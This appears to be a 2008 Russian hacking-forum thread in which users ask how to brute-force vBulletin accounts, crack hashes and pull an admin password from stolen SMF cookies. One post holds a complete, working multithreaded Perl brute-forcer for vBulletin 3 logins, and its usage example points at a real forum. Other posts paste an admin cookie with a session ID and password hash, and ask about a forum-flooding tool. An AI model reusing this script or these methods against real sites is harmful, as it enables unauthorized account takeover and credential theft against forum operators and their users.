 |
|
25.09.2008, 17:00
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами:
9560486
Репутация:
1809
|
|
Господа! Чем подбирать пароль к аку vBulletin 3.0.x ?
|
|
|
28.09.2008, 15:09
|
|
Новичок
Регистрация: 30.06.2008
Сообщений: 16
С нами:
9402645
Репутация:
8
|
|
такой вопрос что за хеш если это ваще хеш fsH1sRBI6rLuQ! не могли бы помочь рассшифровать!
|
|
|
|
04.10.2008, 16:20
|
|
Banned
Регистрация: 10.04.2008
Сообщений: 618
С нами:
9518786
Репутация:
942
|
|
Брут на перле
Код:
#!/usr/bin/perl
#################################################
# vBulletin 3 (rus) brute
# -------------
#
# copyright : (C) Cyber Lords, 2002-2007
# http://www.cyberlords.net
#
# Coded by VeX [614883]
#################################################
### modules ###
use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Std;
### main ###
usage() if ($ARGV[0] eq "-h" || $ARGV[0] eq "-help");
print "\n\n~~~ vBulletin 3 (rus) brute by VeX 1.0.3 ~~~\n\n";
getopt("lpuht");
$logins = $opt_l || 'logins.txt';
$pass = $opt_p || 'pass.txt';
$host = $opt_u;
$logs = $opt_h || 'logs.txt';
$threads = $opt_t || 50;
open(P, $pass) or die "\n[-] Don't open ".$pass." file\n";
while(<P>) { push(@pass, $_); }
close(P);
open(L, $logins) or die "\n[-] Don't open ".$logins." file\n";
while(<L>) { push(@logins, $_); }
close(L);
print "[+] Loading ".scalar(@logins)." logins\n"; logs("[+] Loading ".scalar(@logins)." logins\n");
print "[+] Loading ".scalar(@pass)." passwords\n"; logs("[+] Loading ".scalar(@pass)." passwords\n\n");
foreach $login (@logins)
{
chomp($login);
foreach $pass (@pass)
{
chomp($pass);
push (@info, "$login---$pass");
}
}
#for(@info){ print "$_\n"; }
while(1) {
for ($i=0;$i<=$threads;$i++) {
unless($info[$counter]) {
killpidz();
exit;
}
if ($pid=fork()) {
push(@forked,$pid);
}
else {
($user, $pass) = split /---/, $info[$counter];
chomp($user); chomp($pass);
if(brute($user, $pass))
{
print "\n\n[+] Find [$user:$pass]";
logs("\n\n[+] Find [$user:$pass]");
$counter = scalar(@info)+1;
exit(1);
}
exit;
}
$counter++;
}
killpidz();
}
sub brute {
my($user, $pass) = @_;
$data = "vb_login_username=$user&cookieuser=1&vb_login_password=$pass&s=&do=login&vb_login_md5password=&vb_login_md5password_utf=";
$cookie_jar = new HTTP::Cookies();
$opera = new LWP::UserAgent;
$opera->agent('Opera/9.0 (Windows NT 5.1; U; en; (R1 1.5))');
$opera->timeout(30);
$h = new HTTP::Headers
Accept => 'application/vnd.ms-excel, application/msword, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-comet, */*',
User_Agent => 'Opera/9.0 (Windows NT 5.1; U; en; (R1 1.5))',
Referer => 'http://google.com/';
$request = new HTTP::Request('GET', $host, $h);
$response = $opera -> request($request);
$content = $response -> content;
$cookie_jar->extract_cookies($response);
open(C, ">login_1.html"); print C $content; close(C);
$h = new HTTP::Headers
Accept => 'application/vnd.ms-excel, application/msword, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-comet, */*',
User_Agent => 'Opera/9.0 (Windows NT 5.1; U; en; (R1 1.5))',
Referer => $host;
$request = new HTTP::Request('POST', $host."login.php?do=login", $h);
$cookie_jar -> add_cookie_header($request);
$request->content_type('application/x-www-form-urlencoded');
$request->content('type=another');
$request->content($data);
$response = $opera -> request($request);
$content = $response -> content;
$cookie_jar->extract_cookies($response);
open(C, ">login_2.html"); print C $content; close(C);
if($content=~m/Спасибо за вход/){ print "[+] $user:$pass ... ok\n"; return 1; }
else{ print "[-] $user:$pass ... error\n"; return 0; }
}
sub logs {
$text = shift;
open(L, ">>".$logs); print L $text; close(L);
}
sub usage {
print "\nUsage: $0 [options]...\n\n";
print "Options are:
-u: Forum url
-l: Login's file [Default: login.txt]
-p: Password's file [Default: pass.txt]
-h: Log's file [Default: logs.txt]
-t: Threads [Degault: 50]
-h: This help
Exemple:
perl brute.pl -u \"http://www.raginfo.ru/forum/\" -l users.txt -p big_pass.txt -h logi.txt -t 25\n";
exit(1);
}
sub killpidz {
foreach (@forked) {
chomp;
waitpid($_,0);
kill("TERM" => $_)
}
undef @forked;
}
exit(1);
|
|
|
|
28.10.2008, 12:16
|
|
Новичок
Регистрация: 28.10.2008
Сообщений: 1
С нами:
9229347
Репутация:
0
|
|
баг с session
нашел в логах следующее
String found where operator expected at (eval 15) line 1, near ")",""
\t(Missing operator before ","?) Bareword found where operator expected at (eval 15) line 1, near "","_SESSION_EXPIRE_LIST"
\t(Missing operator before _SESSION_EXPIRE_LIST?)
String found where operator expected at (eval 15) line 1, near "_SESSION_EXPIRE_LIST" => {""
Unquoted string "logged" may clash with future reserved word at (eval 15) line 1.
String found where operator expected at (eval 15) line 1, near "in" => 2400},""
Bareword found where operator expected at (eval 15) line 1, near "" => 2400},"reg_from"
\t(Missing operator before reg_from?)
String found where operator expected at (eval 15) line 1, near "reg_from" => ""
Bareword found where operator expected at (eval 15) line 1, near "" => "http"
\t(Missing operator before http?)
Unquoted string "http" may clash with future reserved word at (eval 15) line 1.
Bareword found where operator expected at (eval 15) line 1, near "//meet"
\t(Missing operator before eet?)
Unquoted string "eet" may clash with future reserved word at (eval 15) line 1.
Unquoted string "sotchi" may clash with future reserved word at (eval 15) line 1.
Unquoted string "ru" may clash with future reserved word at (eval 15) line 1.
Unquoted string "fcgi" may clash with future reserved word at (eval 15) line 1.
Unquoted string "fpl" may clash with future reserved word at (eval 15) line 1.
Unquoted string "sid" may clash with future reserved word at (eval 15) line 1.
Bareword found where operator expected at (eval 15) line 1, near "9a41fb838f1db13b9a43be32ac07e07e"
\t(Missing operator before a41fb838f1db13b9a43be32ac07e07e?)
String found where operator expected at (eval 15) line 1, at end of line
Can't find string terminator '"' anywhere before EOF at (eval 15) line 1.
Can't find string terminator '"' anywhere before EOF at (eval 15) line 1.
Can't find string terminator '"' anywhere before EOF at (eval 15) line 1.
Use of uninitialized value in sprintf at /usr/local/lib/perl5/site_perl/5.8.8/CGI/Session/File.pm line 93.
incomplete headers (0 bytes) received from server "/usr/local/www/meet.sotchi.ru/fcgi-bin/__start.fpl"
и соответсвенно в файле сессии (юзаю CGI::Session::File), вижу следующее (переводы строк добавил для формата):
$D = {
"password_value" => 148,
"bd2" => 12,
"bd1" => 23,
"myid" => 62,
"password" => 148,
"res_save" => "",
"reg_count" => 0,
"code" => "81o4d9yrjswtgxq9nfl66wei3j46tok6",
"_SESSION_ID" => "9a41fb838f1db13b9a43be32ac07e07e",
"_SESSION_ETIME" => 2400,
"reg_error_descr" => "",
"ccode" => "0519",
"location" => 1,
"~logged-in" => 1,
"_SESSION_REMOTE_ADDR" => "62.xxx...",
"_SESSION_CTIME" => "1225126077",
"login" => "Dandy",
"_SESSION_ATIME" => "1225127741",
"bd3" => 1982,
"reg_error" => "",
"login_value" => "abc \x{422}\x{441}\x{441}.. )",
"_SESSION_EXPIRE_LIST" => {"~logged-in" => 2400},
"reg_from" => "blah blah ?sid=9a41fb838f1db13b9a43be32ac07e07e"
};
{441}.. )",
"_SESSION_EXPIRE_LIST" => {"~logged-in" => 2400},
};
Я так понимаю тут уязвимость с Unicode или что то еще... есть мысли?
|
|
|
|
29.10.2008, 19:07
|
|
Новичок
Регистрация: 28.10.2008
Сообщений: 4
С нами:
9229222
Репутация:
0
|
|
Можно ли вытащить из куков пароль админа а то на сайт по логином админа подставив куки зайти могу в админку нет((
вот куки:
SMFCookie692=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B i%3A1%3Bs%3A40%3A%22bb70ecc84a7a7d197e7017d250e60a 3be8309ea0%22%3Bi%3A2%3Bi%3A1414066970%3Bi%3A3%3Bi %3A0%3B%7D;%20PHPSESSID=89e357839c94fb76eeb52c6ab8 c404d7
|
|
|
|
01.11.2008, 16:56
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами:
9838057
Репутация:
302
|
|
Блин ребята я уже замучился =)
Вобщем нужна версия http://www.myrpg.ru/forum движек IPB и еще =) Может кто подскажет куда там делся файл http://www.myrpg.ru/forum/admin.php и уж если совем не лень то пожалуйста где там лежат .js
PS: Не я не полный нюб но все же =)
|
|
|
|
05.11.2008, 18:58
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 2
С нами:
9227680
Репутация:
0
|
|
Хай, У меня вопрос скачал antiturk v 1.0 (Флудилка по форума )
На на форумах mybb . ru почему-то не пашит пробывал но нечего не получилось,смотрел видео как это делать....
Пишит ошибку a key with the name ----------------------------------------- потом цифры и all ready used .... внизу скрин
http://i033.radikal.ru/0811/70/e84892083a1c.png
И если вам не тяжело можете выложить тему где все всё всё есть для накрутки мубб.ру итг.......
|
|
|
|
06.11.2008, 02:14
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 2
С нами:
9227680
Репутация:
0
|
|
Я получу ответ на свой вопрос или нет?
|
|
|
|
07.11.2008, 00:13
|
|
Участник форума
Регистрация: 08.11.2006
Сообщений: 208
С нами:
10266046
Репутация:
184
|
|
Demonboy возможно это хеш пасса?
bb70ecc84a7a7d197e7017d250e60a 3be8309ea0
|
|
|
|
10.11.2008, 10:44
|
|
Новичок
Регистрация: 07.04.2005
Сообщений: 20
С нами:
11101353
Репутация:
0
|
|
Последний раз редактировалось GaD; 10.11.2008 в 10:46..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
